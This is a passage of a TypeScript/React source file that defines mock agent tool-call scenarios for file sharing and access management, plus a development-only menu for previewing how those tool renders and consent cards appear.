  accessCard('share_revoke', 'share_link — revoke', 'kill a link', {
    tool: 'share_link', action: 'revoke',
    summary: 'Revoke the outsider share link for the Q3 Report.',
    payload: { fileId: 'f_q3', fileName: 'Q3 Report' },
  }),
  // read-channel results (no card — plain tool-call blocks)
  toolcall('access_list', 'manage_access — list (read)', 'Access & sharing', 'who can reach a folder', {
    toolName: 'manage_access',
    input: { action: 'list', folderId: 'f_q3' },
    title: 'Manage access: list',
    output: JSON.stringify({ direct: [{ email: 'bob@acme.com', permission: 'admin' }], teams: [{ team: 'Design', permission: 'readwrite' }], roleDefaults: [{ role: 'member', permission: 'readcopy' }] }, null, 2),
  }),
  // Since #518A this raises a CONSENT CARD and the WORKER performs the create,
  // so the mock is an `accessCard`, not a `toolcall`. As a tool-call block it
  // rendered no card at all while its label promised one — i.e. it showed the
  // pre-#518A rendering this menu exists to let someone eyeball and reject.
  //
  // Two values are load-bearing and must mirror the tool exactly. `tool` is
  // 'chain_folder' because `parseAccessRequest` refuses any tool outside
  // ACCESS_CARD_TOOLS. NOT because of the emitter check beside it — that one is
  // INERT here: a mock question carries no `tool` field, so `MessageList`
  // resolves no emitter and the check fails open. Which is why the mock cannot
  // catch a card whose claimed tool disagrees with its stamp; a wrong value here
  // renders a plausible card with the wrong icon and title instead of nothing.
  // `action` is 'create_mount'
  // — the wire name no client table resolves, which is what stops an old bundle
  // POSTing the create the worker has already done. The tool's own `action`
  // ARGUMENT is 'create' (`z.enum(['create'])`); 'create_mount' exists only on
  // the wire, and putting it in a tool-call `input` showed a call the tool can
  // never receive.
  accessCard('chain_folder_create', 'chain_folder — create mount (card)', 'mount a .chain', {
    tool: 'chain_folder',
    action: 'create_mount',
    payload: { parentId: 'app_folder', targetFileId: 'f_reports', name: 'reports.chain' },
    summary: 'Create a .chain mount named "reports.chain" to "Reports" in "Analytics.pdapp".',
  }),
]

interface Props {
  active: DevMockScenario | null
  onSelect: (scenario: DevMockScenario | null) => void
}

/** DEV-ONLY. Renders null in production builds. */
export function DevToolRenderMenu({ active, onSelect }: Props) {
  const [open, setOpen] = useState(false)
  const containerRef = useRef<HTMLDivElement>(null)

  useDismiss(containerRef, () => setOpen(false), { enabled: open })

  if (!import.meta.env.DEV) return null

  // Preserve catalog order while grouping.
  const groups: string[] = []
  for (const s of DEV_MOCK_SCENARIOS) if (!groups.includes(s.group)) groups.push(s.group)

  return (
    <div ref={containerRef} className="relative shrink-0">
      <button
        type="button"
        onClick={() => setOpen(v => !v)}
        title="Dev: preview agent tool renders"
        className={`flex items-center gap-1 px-2 py-0.5 rounded-full text-[11px] border transition-colors ${
          active
            ? 'text-brand-300 border-brand-500/50 bg-brand-500/10'
            : 'themed-text-muted hover:themed-text themed-bg-secondary themed-border'
        }`}
      >
        <Palette size={11} />
        <span className="max-w-[120px] truncate">{active ? active.label : 'Render'}</span>
        <ChevronUp size={10} className={`transition-transform ${open ? 'rotate-180' : ''}`} />
      </button>

      {open && (
        <div className="absolute bottom-full left-0 mb-1 w-64 max-h-[60vh] overflow-y-auto rounded-lg themed-bg-secondary border themed-border shadow-lg z-50">
          <div className="px-3 py-1.5 text-[10px] uppercase tracking-wider themed-text-muted font-medium border-b themed-border sticky top-0 themed-bg-secondary">
            Preview render (dev)
          </div>
          {active && (
            <button
              type="button"
              onClick={() => { onSelect(null); setOpen(false) }}
              className="w-full flex items-center gap-2 px-3 py-1.5 text-xs text-red-400 hover:bg-red-500/10 transition-colors border-b themed-border"
            >
              <X size={11} />
              <span className="flex-1 text-left">Clear preview</span>
            </button>
          )}
          {groups.map((group, gi) => (
            <div key={group}>
              {gi > 0 && <div className="border-t themed-border" />}
              <div className="px-3 py-1 text-[10px] uppercase tracking-wider themed-text-muted font-medium">{group}</div>
              {DEV_MOCK_SCENARIOS.filter(s => s.group === group).map(s => {
                const isActive = active?.id === s.id
                return (
                  <button
                    key={s.id}
                    type="button"
                    onClick={() => { onSelect(s); setOpen(false) }}
                    className={`w-full flex flex-col items-start px-3 py-1.5 transition-colors ${
                      isActive ? 'themed-text bg-brand-500/10' : 'themed-text-muted hover:themed-text hover:themed-bg-tertiary'
                    }`}
                  >
                    <span className="text-xs">{s.label}</span>
                    {s.hint && <span className="text-[10px] opacity-60">{s.hint}</span>}
                  </button>
                )
              })}
            </div>
          ))}
        </div>
      )}
    </div>
  )
}
